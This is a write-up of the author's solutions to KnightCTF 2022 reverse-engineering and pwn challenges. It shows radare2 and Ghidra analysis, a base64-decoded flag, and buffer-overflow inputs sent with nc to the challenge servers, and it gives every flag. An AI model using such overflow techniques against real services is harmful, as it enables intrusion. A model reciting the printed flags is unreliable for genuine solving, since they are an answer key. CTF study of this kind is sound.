KNIGHTCTF 2022 - WRITEUP

This was a quiet a CTF and basically it's the CTF I just started my year with! I was playing this CTF with my team `UrchinSec` where actually we split into two teams since one team only allowed 5 members so we were `urchinsec` and `urchinsec II` , In this writeup i'll share on how I solved some of the challenges in this CTF! ### REVERSE ENGINEERING ##### Flag Vault (25 points) ``` Unlock the vault & grab the flag. ``` So I downloaded the file , extracted the zip file to get the binary ``` ┌─[tahaafarooq@cyberwarriors]─[~/Desktop/knightctf/rev/flagvault] └──╼ $file The_Flag_Vault The_Flag_Vault: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8db1599916703d131749a488d7c16fd334f6a84d, for GNU/Linux 3.2.0, not stripped ``` It's an ELF executable , so I first check for strings available ![](https://i.imgur.com/2rCA1u4.png) Nothing much on strings , so I now run the binary to see what it does, before I disassemble it , so as I know what to look for, ```= └──╼ $./The_Flag_Vault Hi there! Please enter the password to unlock the flag vault: leetman Sorry! You have entered a wrong password! Please try with a valid one! If you don't have the password, you can buy that here at https://knightsquad.org ``` It asks for a password , so let's shoot it to radare2 ![](https://i.imgur.com/ZRZ9rUd.png) I have two functions `main` and `sym.flag`, checking on `sym.flag` it's just nothing , so I now check on `main` ![](https://i.imgur.com/JLHEUdf.png) I can see the flag, but it's shuffled but then I can clearly see another word `abracadabrahahaha` and that's clearly the password since it's being sent to `strcmp` function , so I now run the binary and put that as the password ```= [0x7f6331a3d090]> dc Hi there! Please enter the password to unlock the flag vault: abracadabrahahaha Congratulations! Here is your flag: KCTF{welc0me_t0_reverse_3ngineering} (16729) Process exited with status=0x0 ``` FLAG : `KCTF{welc0me_t0_reverse_3ngineering}` ##### The Encoder (50 points) ```= A friend of mine sent me the following numbers and the binary and told me that he used that binary to encrypt something interesting for me. 1412 1404 1421 1407 1460 1452 1386 1414 1449 1445 1388 1432 1388 1415 1436 1385 1405 1388 1451 1432 1386 1388 1388 1392 1462 Can you find out what all these numbers mean? ``` So given some weird numbers and a binary , So I first run the binary to see what it does and it encodes an alphabet to number digit of 4 bytes ```= └──╼ $./the_encoder.out Welcome to the encoder Please give me a plain text of max 40 characters admin 1434 1437 1446 1442 1447 ``` So I now know the flag format which is `KCTF{}` so I try encoding `KCTF{}` using that binary and see the output ```= └──╼ $./the_encoder.out Welcome to the encoder Please give me a plain text of max 40 characters KCTF{ 1412 1404 1421 1407 1460 ``` And I get the output which is the same as the first 5 encoded alphabets, which are mentioned on the description , So I do it manually LOL, I actually made an output of encoded all 26 alphabets in caps and small and numbers ```= └──╼ $./the_encoder.out Welcome to the encoder Please give me a plain text of max 40 characters ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890{}_ 1402 1403 1404 1405 1406 1407 1408 1409 1410 1411 1412 1413 1414 1415 1416 1417 1418 1419 1420 1421 1422 1423 1424 1425 1426 1427 1434 1435 1436 1437 1438 1439 1440 1441 1442 1443 1444 1445 1446 ``` And I now start comparing with the numbers in the description and I get the flag, tho we could automate it with python, or any language of your choice FLAG : `KCTF{s1Mpl3_3Nc0D3r_1337}` ##### Baby Shark (50 points) ``` During my holiday in Bahamas, I met a baby shark. The shark wanted to sing me something but couldn't. Can you sing that for me? ``` Given a `.jar` file , I use `jd-gui` to open it up and analyse it ![](https://i.imgur.com/LqyewhY.png) But we have `Flag.class` tho it's having a fake flag. Flag.class ```java= package kctf.flag; public class Flag { private static final int count = 0; private static final String flag = "KCTF{this_is_not_the_flag}"; private static final String comment = "You thought this was the flag? LOL"; } ``` Main.class ```java= package kctf; public class Main { public static void main(String[] args) throws Exception { Sound s = new Sound(); s.play(); } } ``` Okay so the `Main.class` is calling the `Sound()` function and it's from `Sound.class` let's have a look at it ```java= package kctf; import javax.sound.sampled.AudioInputStream; import javax.sound.sampled.AudioSystem; import javax.sound.sampled.Clip; public class Sound { public void play() { try { AudioInputStream audioIn = AudioSystem.getAudioInputStream(getClass().getClassLoader().getResource("audio.wav").toURI().toURL()); Clip clip = AudioSystem.getClip(); clip.open(audioIn); clip.start(); while (true) { System.out.println("Baby shark do doo dooo doo"); } } catch (Exception e) { e.printStackTrace(); return; } } } ``` Welp Nothing important , but we have `constants` taking a look at it we have `Strings.class` ```java= package kctf.constants; public class Strings { public static final String _0xf1a6 = "7P0HJKddEnGG=="; public static final String _0xflac = "LoE2301mP00FZFWeEQJJR=="; public static final String _0xface = "N5tFdK18ZKN0442LDVZXSWE7k71Dfr=="; public static final String _0xfj23 = "ns3PTTDkVYsslUI=="; public static final String _0xfka6 = "rN88230S8892KL332GDxV1DK="; public static final String _0xflag = "S0NURns3SDE1X1dANV8zNDVZX1IxNkg3P30="; } ``` And the flag is obviously `S0NURns3SDE1X1dANV8zNDVZX1IxNkg3P30=` so decoding it I get ``` └──╼ $base64 -d <<< "S0NURns3SDE1X1dANV8zNDVZX1IxNkg3P30=" KCTF{7H15_W@5_345Y_R16H7?} ``` FLAG : `KCTF{7H15_W@5_345Y_R16H7?}` That was it for me on the reverse engineering category the rest of the challenges were solved by my team mates ### PWN ##### What's Your Name (50 points) ``` Let us know your good name. nc 198.211.115.81 10001 ``` I first download the binary , And I was analyzing it with radare then I realized it has a buffer of 100 chars ``` 0x0040115e c745fc640000. mov dword [var_4h], 0x64 ; 'd' ; 100 ``` So surely it's buffer overflow vuln, since we have `gets()` used , and it's calling `cat /home/hacker/flag.txt`, so I generate 125 characters and then input them when it asks for my name ```= └──╼ $nc 198.211.115.81 10001 What's your name ? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA KCTF{bAbY_bUfF3r_0v3Rf1Ow} ``` and I have the flag FLAG: `KCTF{bAbY_bUfF3r_0v3Rf1Ow}` ##### Hackers Vault (100 points) ``` Knight Squad members are using a hacker vault to store a secret. Can you find our their secret ? nc 198.211.115.81:9999 ``` Given the binary I open it up in ghidra to decompile it and understand how it works ```c= undefined8 main(void) { int i; int c; int b; int a; setvbuf(stdout,(char *)0x0,2,0); puts("Welcome to Hackers Vault..."); printf("Please enter your pass code : "); a = 0; b = 0; __isoc99_scanf(&DAT_00402047,&i); for (; i != 0; i = i / 10) { c = i % 10; b = b + c; a = a + 1; } if (b == 0x30) { puts("\n"); puts("Welcome to your vault..."); puts("Your Secret : "); system("cat /home/hacker/flag.txt"); } else { puts("Wrong pass code"); } return 0; } ``` So it takes the input the we got a for loop where as `i` is your input and should be not equal to 0, and it'll be devided by 10 , then we have `c` which ill be the modulus of `i` and 10, and `b` will be added with `c` then we have an if condition which compares if `b` is equal to `0x30` where as `0x30` is `48` in decimal, so we I have to put an input that should give `b` as an ending result to `48` where as I did some maths and came to the conclusion where `6*8=48` giving me me `888888` as the input of the passcode and will also have `b` to give `48` ```= └──╼ $nc 198.211.115.81 9999 Welcome to Hackers Vault... Please enter your pass code : 888888 Welcome to your vault... Your Secret : KCTF{b1NaRy_3xOpL0iTaT1On_r0cK5} ``` FLAG : `KCTF{b1NaRy_3xOpL0iTaT1On_r0cK5}` ##### What's Your Name - 2 (100 points) ``` Let us know your name and make sure you have enough money ;P nc 198.211.115.81 10002 ``` This was a bit trickier, and it's obviously buffer overflow since `strcpy` is being used without protection ```= 0x004011ce e85dfeffff call sym.imp.strcpy 0x004011d3 8b45fc mov eax, dword [var_4h] 0x004011d6 3d4c454554 cmp eax, 0x5445454c 0x004011db 752f jne 0x40120c 0x004011dd 8b45f8 mov eax, dword [var_8h] 0x004011e0 3d4e544b53 cmp eax, 0x534b544e ``` So it takes and compares those two hex chars whic are `LEET` and `NTKS`, I used GDB to debug and found out the offset is 88 , So I generated a simple payload `"A"*88 + LEET + NTKS` but it didn't work then I debug again realizing that NTKS on the ending is a junk how it should really be is `"A"*88 + NTKS + LEET + NTKS` ```= └──╼ $nc 198.211.115.81 10002 What's your name ? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANTKSLEETNTKS KCTF{bUfF3r_0v3Rf1Ow_i5_fUn_r1Gh7} I liked your name and you got enough money :D ``` FLAG : `KCTF{bUfF3r_0v3Rf1Ow_i5_fUn_r1Gh7}`